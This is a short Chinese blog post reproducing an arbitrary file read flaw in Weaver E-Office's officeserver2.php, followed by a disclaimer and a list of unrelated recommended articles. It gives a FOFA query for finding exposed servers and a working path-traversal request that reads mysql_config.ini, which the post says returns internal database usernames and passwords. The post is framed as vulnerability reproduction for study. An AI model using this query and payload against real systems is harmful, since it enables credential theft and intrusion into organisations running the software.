E-Office(泛微OA)前台任意文件读取漏洞复现

简介

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。

officeserver.php文件存在任意文件读取漏洞,通过漏洞可以下载服务器上的任意文件。

漏洞复现

FOFA语法:

app="泛微-EOffice" && icon_hash="1578525679"

访问后页面如下:

POC:

/iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini

响应返回页面获取到内网区域数据库用户名和密码

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

相关推荐
三无少女指南21 小时前
深入理解JVM的安全点与安全区域
jvm·安全
wanhengidc21 小时前
云手机和虚拟机的区别都有哪些?
运维·服务器·安全·智能手机·玩游戏
xixixi777771 天前
信息安全和网络安全的区分在哪
网络·安全·web安全·信息安全
金仓拾光集1 天前
__金仓数据库替代MongoDB护航医疗隐私:医院患者随访记录安全存储实践__
数据库·安全·mongodb
newxtc1 天前
【江苏政务服务网-注册_登录安全分析报告】
人工智能·安全·yolo·政务·1024程序员节·安全爆破
lang201509281 天前
Spring空安全指南:告别空指针异常
java·安全·spring
安当加密1 天前
如何通过掌纹识别实现Windows工作站安全登录:从技术原理到企业级落地实践
windows·安全·1024程序员节
广州华锐视点1 天前
电力电网安全实训难题多?VR安全教育软件给出新方案
安全
德迅云安全杨德俊1 天前
SCDN:互联网时代网站安全的安全保障
网络·安全·ddos
喜欢你,还有大家1 天前
SELinux 安全机制
服务器·网络·安全